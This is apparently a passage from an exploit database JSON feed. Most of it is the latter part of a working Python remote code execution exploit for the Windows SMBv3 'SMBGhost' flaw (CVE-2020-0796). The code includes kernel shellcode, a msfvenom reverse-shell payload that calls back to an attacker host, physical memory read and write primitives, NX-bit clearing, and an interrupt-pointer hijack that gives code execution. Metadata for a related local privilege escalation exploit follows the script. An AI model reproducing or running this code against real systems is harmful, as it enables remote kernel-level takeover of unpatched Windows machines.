= 0x78\n\nKUSER_SHARED_DATA = 0xFFFFF78000000000\n\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\nPNET_RAW_BUFF_OFFSET = 0x18\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\nPMDL1_OFFSET = 0x38\n\n# Shellcode from kernel_shellcode.asm\n\nKERNEL_SHELLCODE = b\"\\x41\\x50\\x41\\x51\\x41\\x55\\x41\\x57\\x41\\x56\\x51\\x52\\x53\\x56\\x57\\x4C\"\nKERNEL_SHELLCODE += b\"\\x8D\\x35\\xA0\\x02\\x00\\x00\\x49\\x8B\\x86\\xD0\\x00\\x00\\x00\\x49\\x8B\\x9E\"\nKERNEL_SHELLCODE += b\"\\xD8\\x00\\x00\\x00\\x48\\x89\\x18\\xFB\\x49\\x8B\\x86\\xE0\\x00\\x00\\x00\\x48\"\nKERNEL_SHELLCODE += b\"\\x2D\\x00\\x10\\x00\\x00\\x66\\x81\\x38\\x4D\\x5A\\x75\\xF3\\x49\\x89\\xC7\\x4D\"\nKERNEL_SHELLCODE += b\"\\x89\\xBE\\xE0\\x00\\x00\\x00\\xBF\\x78\\x7C\\xF4\\xDB\\xE8\\xDA\\x00\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x49\\x89\\xC5\\xBF\\x3F\\x5F\\x64\\x77\\xE8\\x2E\\x01\\x00\\x00\\x48\\x89\\xC1\"\nKERNEL_SHELLCODE += b\"\\xBF\\xE1\\x14\\x01\\x17\\xE8\\x21\\x01\\x00\\x00\\x48\\x89\\xC2\\x48\\x83\\xC2\"\nKERNEL_SHELLCODE += b\"\\x08\\x49\\x8D\\x74\\x0D\\x00\\xE8\\xFF\\x00\\x00\\x00\\x3D\\xD8\\x83\\xE0\\x3E\"\nKERNEL_SHELLCODE += b\"\\x74\\x0A\\x4D\\x8B\\x6C\\x15\\x00\\x49\\x29\\xD5\\xEB\\xE5\\xBF\\x48\\xB8\\x18\"\nKERNEL_SHELLCODE += b\"\\xB8\\x4C\\x89\\xE9\\xE8\\x91\\x00\\x00\\x00\\x49\\x89\\x06\\x4D\\x8B\\x4D\\x30\"\nKERNEL_SHELLCODE += b\"\\x4D\\x8B\\x45\\x38\\x49\\x81\\xE8\\xF8\\x02\\x00\\x00\\x48\\x31\\xF6\\x49\\x81\"\nKERNEL_SHELLCODE += b\"\\xE9\\xF8\\x02\\x00\\x00\\x41\\x8B\\x79\\x74\\x0F\\xBA\\xE7\\x04\\x73\\x05\\x4C\"\nKERNEL_SHELLCODE += b\"\\x89\\xCE\\xEB\\x0C\\x4D\\x39\\xC8\\x4D\\x8B\\x89\\xF8\\x02\\x00\\x00\\x75\\xDE\"\nKERNEL_SHELLCODE += b\"\\x48\\x85\\xF6\\x74\\x40\\x49\\x8D\\x4E\\x08\\x48\\x89\\xF2\\x4D\\x31\\xC0\\x4C\"\nKERNEL_SHELLCODE += b\"\\x8D\\x0D\\xB9\\x00\\x00\\x00\\x52\\x41\\x50\\x41\\x50\\x41\\x50\\xBF\\xC4\\x5C\"\nKERNEL_SHELLCODE += b\"\\x19\\x6D\\x48\\x83\\xEC\\x20\\xE8\\x2F\\x00\\x00\\x00\\x48\\x83\\xC4\\x40\\x49\"\nKERNEL_SHELLCODE += b\"\\x8D\\x4E\\x08\\xBF\\x34\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x19\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x48\\x83\\xC4\\x20\\xFA\\x48\\x89\\xD8\\x5F\\x5E\\x5B\\x5A\\x59\\x41\\x5E\"\nKERNEL_SHELLCODE += b\"\\x41\\x5F\\x41\\x5D\\x41\\x59\\x41\\x58\\xFF\\xE0\\xE8\\x02\\x00\\x00\\x00\\xFF\"\nKERNEL_SHELLCODE += b\"\\xE0\\x53\\x51\\x56\\x41\\x8B\\x47\\x3C\\x4C\\x01\\xF8\\x8B\\x80\\x88\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x4C\\x01\\xF8\\x50\\x8B\\x48\\x18\\x8B\\x58\\x20\\x4C\\x01\\xFB\\xFF\\xC9\"\nKERNEL_SHELLCODE += b\"\\x8B\\x34\\x8B\\x4C\\x01\\xFE\\xE8\\x1F\\x00\\x00\\x00\\x39\\xF8\\x75\\xEF\\x58\"\nKERNEL_SHELLCODE += b\"\\x8B\\x58\\x24\\x4C\\x01\\xFB\\x66\\x8B\\x0C\\x4B\\x8B\\x58\\x1C\\x4C\\x01\\xFB\"\nKERNEL_SHELLCODE += b\"\\x8B\\x04\\x8B\\x4C\\x01\\xF8\\x5E\\x59\\x5B\\xC3\\x52\\x31\\xC0\\x99\\xAC\\xC1\"\nKERNEL_SHELLCODE += b\"\\xCA\\x0D\\x01\\xC2\\x85\\xC0\\x75\\xF6\\x92\\x5A\\xC3\\xE8\\xA1\\xFF\\xFF\\xFF\"\nKERNEL_SHELLCODE += b\"\\x80\\x78\\x02\\x80\\x77\\x05\\x0F\\xB6\\x40\\x03\\xC3\\x8B\\x40\\x03\\xC3\\x41\"\nKERNEL_SHELLCODE += b\"\\x57\\x41\\x56\\x57\\x56\\x48\\x8B\\x05\\x0A\\x01\\x00\\x00\\x48\\x8B\\x48\\x18\"\nKERNEL_SHELLCODE += b\"\\x48\\x8B\\x49\\x20\\x48\\x8B\\x09\\x66\\x83\\x79\\x48\\x18\\x75\\xF6\\x48\\x8B\"\nKERNEL_SHELLCODE += b\"\\x41\\x50\\x81\\x78\\x0C\\x33\\x00\\x32\\x00\\x75\\xE9\\x4C\\x8B\\x79\\x20\\xBF\"\nKERNEL_SHELLCODE += b\"\\x5E\\x51\\x5E\\x83\\xE8\\x58\\xFF\\xFF\\xFF\\x49\\x89\\xC6\\x4C\\x8B\\x3D\\xB3\"\nKERNEL_SHELLCODE += b\"\\x01\\x00\\x00\\x31\\xC0\\x44\\x0F\\x22\\xC0\\x48\\x8D\\x15\\x8E\\x01\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x89\\xC1\\x48\\xF7\\xD1\\x49\\x89\\xC0\\xB0\\x40\\x50\\xC1\\xE0\\x06\\x50\\x49\"\nKERNEL_SHELLCODE += b\"\\x89\\x01\\x48\\x83\\xEC\\x20\\xBF\\xEA\\x99\\x6E\\x57\\xE8\\x1A\\xFF\\xFF\\xFF\"\nKERNEL_SHELLCODE += b\"\\x48\\x83\\xC4\\x30\\x48\\x8B\\x3D\\x63\\x01\\x00\\x00\\x48\\x8D\\x35\\x77\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x00\\xB9\\x1D\\x00\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x35\\x6E\\x01\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\xB9\\x58\\x02\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x0D\\xD8\\x00\\x00\\x00\\x65\\x48\"\nKERNEL_SHELLCODE += b\"\\x8B\\x14\\x25\\x88\\x01\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x8D\\x0D\\x46\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x41\\x50\\x6A\\x01\\x48\\x8B\\x05\\x22\\x01\\x00\\x00\\x50\\x41\\x50\\x48\"\nKERNEL_SHELLCODE += b\"\\x83\\xEC\\x20\\xBF\\xC4\\x5C\\x19\\x6D\\xE8\\xBD\\xFE\\xFF\\xFF\\x48\\x83\\xC4\"\nKERNEL_SHELLCODE += b\"\\x40\\x48\\x8D\\x0D\\x9E\\x00\\x00\\x00\\x4C\\x89\\xF2\\x4D\\x31\\xC9\\xBF\\x34\"\nKERNEL_SHELLCODE += b\"\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x9E\\xFE\\xFF\\xFF\\x48\\x83\\xC4\\x20\"\nKERNEL_SHELLCODE += b\"\\x5E\\x5F\\x41\\x5E\\x41\\x5F\\xC3\\x90\\xC3\\x48\\x92\\x31\\xC9\\x51\\x51\\x49\"\nKERNEL_SHELLCODE += b\"\\x89\\xC9\\x4C\\x8D\\x05\\x0D\\x00\\x00\\x00\\x89\\xCA\\x48\\x83\\xEC\\x20\\xFF\"\nKERNEL_SHELLCODE += b\"\\xD0\\x48\\x83\\xC4\\x30\\xC3\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x00\\x00\"\nKERNEL_SHELLCODE += b\"\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?\n\nUSER_PAYLOAD = b\"\"\nUSER_PAYLOAD += b\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\"\nUSER_PAYLOAD += b\"\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\"\nUSER_PAYLOAD += b\"\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\"\nUSER_PAYLOAD += b\"\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\"\nUSER_PAYLOAD += b\"\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\"\nUSER_PAYLOAD += b\"\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\"\nUSER_PAYLOAD += b\"\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\"\nUSER_PAYLOAD += b\"\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\"\nUSER_PAYLOAD += b\"\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\"\nUSER_PAYLOAD += b\"\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\"\nUSER_PAYLOAD += b\"\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\"\nUSER_PAYLOAD += b\"\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\"\nUSER_PAYLOAD += b\"\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\"\nUSER_PAYLOAD += b\"\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\"\nUSER_PAYLOAD += b\"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\nUSER_PAYLOAD += b\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\"\nUSER_PAYLOAD += b\"\\x5f\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\"\nUSER_PAYLOAD += b\"\\xa0\\x01\\x00\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x7a\\x69\"\nUSER_PAYLOAD += b\"\\xc0\\xa8\\x8e\\x01\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\"\nUSER_PAYLOAD += b\"\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\"\nUSER_PAYLOAD += b\"\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\"\nUSER_PAYLOAD += b\"\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\\x48\"\nUSER_PAYLOAD += b\"\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\"\nUSER_PAYLOAD += b\"\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\"\nUSER_PAYLOAD += b\"\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\"\nUSER_PAYLOAD += b\"\\x00\\x00\\x49\\xb8\\x63\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\"\nUSER_PAYLOAD += b\"\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\\x57\\x57\\x4d\\x31\\xc0\\x6a\"\nUSER_PAYLOAD += b\"\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\\x24\\x54\\x01\\x01\"\nUSER_PAYLOAD += b\"\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\\x56\\x50\"\nUSER_PAYLOAD += b\"\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\nUSER_PAYLOAD += b\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\"\nUSER_PAYLOAD += b\"\\xff\\xd5\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\"\nUSER_PAYLOAD += b\"\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\"\nUSER_PAYLOAD += b\"\\x95\\xbd\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\"\nUSER_PAYLOAD += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\"\nUSER_PAYLOAD += b\"\\x41\\x89\\xda\\xff\\xd5\"\n\n\nPML4_SELFREF = 0\nPHAL_HEAP = 0\nPHALP_INTERRUPT = 0\nPHALP_APIC_INTERRUPT = 0\nPNT_ENTRY = 0\n\nmax_read_retry = 3\noverflow_val = 0x1100\nwrite_unit = 0xd0\npmdl_va = KUSER_SHARED_DATA + 0x900\npmdl_mapva = KUSER_SHARED_DATA + 0x800\npshellcodeva = KUSER_SHARED_DATA + 0xa00\n\n\nclass MDL:\n def __init__(self, map_va, phys_addr):\n self.next = struct.pack(\"<Q\", 0x0)\n self.size = struct.pack(\"<H\", 0x40)\n self.mdl_flags = struct.pack(\"<H\", 0x5004)\n self.alloc_processor = struct.pack(\"<H\", 0x0)\n self.reserved = struct.pack(\"<H\", 0x0)\n self.process = struct.pack(\"<Q\", 0x0)\n self.map_va = struct.pack(\"<Q\", map_va)\n map_va &= ~0xFFF\n self.start_va = struct.pack(\"<Q\", map_va)\n self.byte_count = struct.pack(\"<L\", 0x1100)\n self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\n phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\n self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\n\n def raw_bytes(self):\n mdl_bytes = self.next + self.size + self.mdl_flags + \\\n self.alloc_processor + self.reserved + self.process + \\\n self.map_va + self.start_va + self.byte_count + \\\n self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\n self.phys_addr3\n return mdl_bytes\n\n\ndef reconnect(ip, port):\n sock = socket.socket(socket.AF_INET)\n sock.settimeout(7)\n sock.connect((ip, port))\n return sock\n\n\ndef write_primitive(ip, port, data, addr):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\n uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\n uncompressed_data += struct.pack('<Q', addr)\n compressed_data = compress(uncompressed_data)\n smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\n sock.close()\n\n\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n compressed_data = compress_evil(data)\n dummy_data = b\"\\x33\"*(overflow_val + offset)\n smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\n sock.close()\n\n\ndef read_physmem_primitive(ip, port, phys_addr):\n i = 0\n while i < max_read_retry:\n i += 1\n buff = try_read_physmem_primitive(ip, port, phys_addr)\n if buff is not None:\n return buff\n\n\ndef try_read_physmem_primitive(ip, port, phys_addr):\n fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\n write_primitive(ip, port, fake_mdl, pmdl_va)\n write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\n\n i = 0\n while i < max_read_retry:\n i += 1\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n buff = sock.recv(1000)\n sock.close()\n if buff[4:8] != b\"\\xfeSMB\":\n return buff\n\n\ndef get_phys_addr(ip, port, va_addr):\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\n\n pml4e = PML4 + pml4_index*0x8\n pdpt_buff = read_physmem_primitive(ip, port, pml4e)\n\n if pdpt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\n pdpte = pdpt + pdpt_index*0x8\n pdt_buff = read_physmem_primitive(ip, port, pdpte)\n\n if pdt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\n pdte = pdt + pdt_index*0x8\n pt_buff = read_physmem_primitive(ip, port, pdte)\n\n if pt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\n \n if pt & (1 << (8 - 1)):\n phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\n return phys_addr\n else:\n pt = pt & 0xFFFFF000\n\n pte = pt + pt_index*0x8\n pte_buff = read_physmem_primitive(ip, port, pte)\n\n if pte_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\n (va_addr & 0xFFF)\n\n return phys_addr\n\n\ndef get_pte_va(addr):\n pt = addr >> 9\n lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\n ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\n 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\n pt = pt | lb\n pt = pt & ub\n\n return pt\n\n\ndef overwrite_pte(ip, port, addr):\n phys_addr = get_phys_addr(ip, port, addr)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] read primitive failed!\")\n\n pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\n\n # Clear NX bit\n overwrite_val = pte_val & (((1 << 63) - 1))\n overwrite_buff = struct.pack(\"<Q\", overwrite_val)\n\n write_primitive(ip, port, overwrite_buff, addr)\n\n\ndef build_shellcode():\n global KERNEL_SHELLCODE\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\n HALP_APIC_REQ_INTERRUPT_OFFSET)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PNT_ENTRY & 0xFFFFFFFFFFFFF000)\n KERNEL_SHELLCODE += USER_PAYLOAD\n\n\ndef search_hal_heap(ip, port):\n global PHALP_INTERRUPT\n global PHALP_APIC_INTERRUPT\n search_len = 0x10000\n\n index = PHAL_HEAP\n page_index = PHAL_HEAP\n cons = 0\n phys_addr = 0\n\n while index < PHAL_HEAP + search_len:\n\n # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \n # so we try to reduce number of reads like this \n \n if not (index & 0xFFF):\n phys_addr = get_phys_addr(ip, port, index)\n else:\n phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n \n # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\n while i < entry_indices:\n entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\n i += 8\n if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\n cons = 0\n continue\n cons += 1\n if cons > 3:\n PHALP_INTERRUPT = index + i - 0x40\n print(\"[+] found HalpInterruptController at %lx\"\n % PHALP_INTERRUPT)\n\n if len(buff) < i + 0x40:\n buff = read_physmem_primitive(ip, port, index + i + 0x38)\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\n \n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n else:\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\n \n print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\n \n return\n index += entry_indices\n\n sys.exit(\"[-] failed to find HalpInterruptController!\")\n\n\ndef search_selfref(ip, port):\n search_len = 0x1000\n index = PML4\n\n while search_len:\n buff = read_physmem_primitive(ip, port, index)\n if buff is None:\n return\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n while i < entry_indices:\n entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\n if entry == PML4:\n return index + i\n i += 8\n search_len -= entry_indices\n index += entry_indices\n\n\ndef find_pml4_selfref(ip, port):\n global PML4_SELFREF\n self_ref = search_selfref(ip, port)\n\n if self_ref is None:\n sys.exit(\"[-] failed to find PML4 self reference entry!\")\n\n PML4_SELFREF = (self_ref & 0xFFF) >> 3\n\n print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\n\n\ndef find_low_stub(ip, port):\n global PML4\n global PHAL_HEAP\n global PNT_ENTRY\n\n limit = 0x100000\n index = 0x1000\n\n while index < limit:\n buff = read_physmem_primitive(ip, port, index)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\n\n if entry == LOWSTUB_JMP:\n print(\"[+] found low stub at phys addr %lx!\" % index)\n PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\n print(\"[+] PML4 at %lx\" % PML4)\n PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\n print(\"[+] base of HAL heap at %lx\" % PHAL_HEAP)\n\n buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n PNT_ENTRY = struct.unpack(\"<Q\", buff[0:8])[0]\n print(\"[+] ntoskrnl entry at %lx\" % PNT_ENTRY)\n return\n\n index += 0x1000\n\n sys.exit(\"[-] Failed to find low stub in physical memory!\")\n\n\ndef do_rce(ip, port):\n find_low_stub(ip, port)\n find_pml4_selfref(ip, port)\n search_hal_heap(ip, port)\n \n build_shellcode()\n\n print(\"[+] built shellcode!\")\n\n pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\n print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\n\n overwrite_pte(ip, port, pKernelUserSharedPTE)\n print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\n \n # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\n to_write = len(KERNEL_SHELLCODE)\n write_bytes = 0\n while write_bytes < to_write:\n write_sz = min([write_unit, to_write - write_bytes])\n write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\n write_bytes += write_sz\n \n print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\n\n input(\"[+] Press a key to execute shellcode!\")\n \n write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\n print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\n \n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\n parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\n default: 445\", required=False, type=int)\n args = parser.parse_args()\n\n do_rce(args.ip, args.port)\n", "sourceHref": "https://0day.today/exploit/34504", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T01:30:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - (SMBGhost) SMB3.1.1 Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34171", "href": "https://0day.today/exploit/description/34171", "sourceData": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation\n\n# CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)\n\n## Authors\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\n\n## References\n\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\n* http://blogs.360.cn/post/CVE-2020-0796.html\n* 